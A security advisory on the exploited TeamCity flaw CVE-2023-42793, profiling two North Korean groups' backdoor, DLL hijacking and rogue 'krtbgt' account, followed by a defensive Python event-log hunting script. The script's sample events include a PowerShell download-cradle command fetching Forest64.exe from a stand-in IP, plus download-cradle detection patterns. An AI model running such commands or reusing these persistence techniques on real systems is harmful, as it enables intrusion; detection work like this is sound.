Take action: this is urgent. Remove your TeamCity server from direct internet exposure if at all possible, and patch now.
Otherwise you will get compromised and spend far more time and stress reporting the incident, rotating every secret and reviewing every line of code that passed through a hacked CI/CD pipeline.
Diamond Sleet and Onyx Sleet, two North Korean state-sponsored threat groups, are currently exploiting a critical remote code execution vulnerability in JetBrains TeamCity server, a widely used CI/CD and DevSecOps platform. TeamCity has over 30,000 users, including large organizations such as Nike, Ferrari, Citibank and Ubisoft, which makes it an attractive target for threat actors.
The vulnerability, tracked as CVE-2023-42793, is an authentication bypass that lets unauthenticated attackers execute arbitrary code on TeamCity On-Premises servers. JetBrains fixed it in TeamCity 2023.05.4 and also ships a security patch plugin for older versions. Because a CI/CD server holds the keys to the pipeline, a successful exploit can lead to source code theft, exposure of service secrets and compromise of private keys.
Threat actor profiles and attack details:
- Diamond Sleet has a history of targeting media, IT services and defense-related organizations worldwide, with espionage, data theft, financial gain and network disruption as its goals. The group has previously targeted security researchers, weaponized open-source software and carried out supply chain compromises. In this campaign Diamond Sleet deploys a backdoor named "ForestTiger" (Forest64.exe). After compromising a TeamCity server, the actor uses PowerShell to download the payloads, including the backdoor and its malware configuration file, from previously compromised infrastructure. ForestTiger creates a scheduled task so that it runs at system startup. Malicious DLLs are also downloaded and staged next to legitimate .exe files to carry out DLL search-order hijacking.
- Onyx Sleet primarily targets defense and IT services organizations in South Korea, the United States and India, and relies on in-house-developed tools to establish persistent access to victim environments and evade detection. After exploiting the TeamCity vulnerability, Onyx Sleet creates a new local user account named "krtbgt", most likely to blend in with the legitimate Windows account "KRBTGT" (note the swapped letters: the rogue account is "krtbgt", the real Kerberos service account is "krbtgt"). The account is added to the local Administrators group, giving it the privileges needed to run system discovery commands on the compromised host. A unique payload is then deployed via PowerShell to maintain a persistent connection between the compromised host and attacker-controlled infrastructure.
Microsoft also observed the attackers using the "krtbgt" account to log on to the compromised device over Remote Desktop Protocol (RDP), and attempting to prevent other threat actors from exploiting the same TeamCity vulnerability.
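The indicators in the two profiles above translate directly into host-level hunts on TeamCity servers. The script below is an added example, not code from the original article or from Microsoft's report. It assumes Windows Security events have been exported as records with their EventData fields flattened to a dict (for example via Get-WinEvent and ConvertTo-Json), that process creation auditing with command-line logging is enabled for event 4688, and that the TeamCity service binary's path contains "TeamCity" (the hypothetical path TeamCityService.exe is an assumption); all sample events and addresses are constructed.

```python
"""Hunt for the TeamCity post-exploitation indicators described above in
exported Windows Security event records. Added example; sample events are
constructed and the TeamCity process path is an assumption."""
import re

# Indicators taken from the write-up. The account match is exact and
# case-insensitive so the legitimate "krbtgt" is never flagged.
ROGUE_ACCOUNT = "krtbgt"
FORESTTIGER_BINARY = re.compile(r"forest64\.exe", re.I)
# Assumption: the TeamCity service/agent binary lives under a path containing
# "TeamCity"; adjust to the install location in your environment.
TEAMCITY_PARENT = re.compile(r"TeamCity", re.I)
# Common PowerShell download cradles; the report only says PowerShell was
# used to fetch payloads, so this list is a practitioner's assumption.
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient)", re.I)


def classify(ev: dict) -> list[str]:
    """Return the indicator names a single event matches (empty if benign)."""
    hits = []
    eid = ev.get("EventID")
    target = (ev.get("TargetUserName") or "").lower()
    if eid == 4688:  # process creation
        if (TEAMCITY_PARENT.search(ev.get("ParentProcessName", ""))
                and ev.get("NewProcessName", "").lower().endswith("powershell.exe")
                and DOWNLOAD_CRADLE.search(ev.get("CommandLine", ""))):
            hits.append("powershell-download-from-teamcity")
    elif eid == 4698:  # scheduled task created; TaskContent is the task XML
        if FORESTTIGER_BINARY.search(ev.get("TaskContent", "")):
            hits.append("foresttiger-scheduled-task")
    elif eid == 4720 and target == ROGUE_ACCOUNT:  # user account created
        hits.append("krtbgt-account-created")
    elif eid == 4732:  # member added to a security-enabled local group
        # Real events may carry only MemberSid; resolve it against the 4720 TargetSid
        # if MemberName is "-".
        member = (ev.get("MemberName") or "").lower()
        if target == "administrators" and ROGUE_ACCOUNT in member:
            hits.append("krtbgt-added-to-administrators")
    elif eid == 4624 and target == ROGUE_ACCOUNT and ev.get("LogonType") == 10:
        hits.append("krtbgt-rdp-logon")  # type 10 = RemoteInteractive (RDP)
    return hits


def hunt(events: list[dict]) -> dict[str, list[int]]:
    """Map each indicator name to the RecordIds of the events that matched it."""
    findings: dict[str, list[int]] = {}
    for ev in events:
        for name in classify(ev):
            findings.setdefault(name, []).append(ev["RecordId"])
    return findings


# Constructed sample: the attack chain from the write-up plus two benign events.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\TeamCity\bin\TeamCityService.exe",  # assumed path
     "CommandLine": "powershell -nop -c (New-Object Net.WebClient).DownloadFile("
                    "'http://203.0.113.10/Forest64.exe','C:\\Users\\Public\\Forest64.exe')"},
    {"RecordId": 2, "EventID": 4698, "TaskName": r"\Forest64",
     "TaskContent": "<Task><Triggers><BootTrigger/></Triggers><Actions><Exec>"
                    "<Command>C:\\Users\\Public\\Forest64.exe</Command></Exec></Actions></Task>"},
    {"RecordId": 3, "EventID": 4720, "TargetUserName": "krtbgt", "SubjectUserName": "SYSTEM"},
    {"RecordId": 4, "EventID": 4732, "TargetUserName": "Administrators",
     "MemberName": "krtbgt", "MemberSid": "S-1-5-21-1-2-3-1005"},
    {"RecordId": 5, "EventID": 4624, "TargetUserName": "krtbgt", "LogonType": 10,
     "IpAddress": "198.51.100.7"},
    # Benign: the real Kerberos service account, network logon.
    {"RecordId": 6, "EventID": 4624, "TargetUserName": "krbtgt", "LogonType": 3, "IpAddress": "-"},
    # Benign: an admin running PowerShell interactively from Explorer.
    {"RecordId": 7, "EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "powershell Get-Process"},
]

if __name__ == "__main__":
    for name, ids in hunt(SAMPLE_EVENTS).items():
        print(f"{name}: records {ids}")
```

On a real host, feed the script the output of Get-WinEvent on the Security log converted to JSON, and treat any hit on the krtbgt rules as a confirmed compromise rather than a lead: the account name has no legitimate reason to exist. The 4688 rule is the noisiest and only works when command-line auditing is on, so pair it with the scheduled-task and account rules rather than relying on it alone.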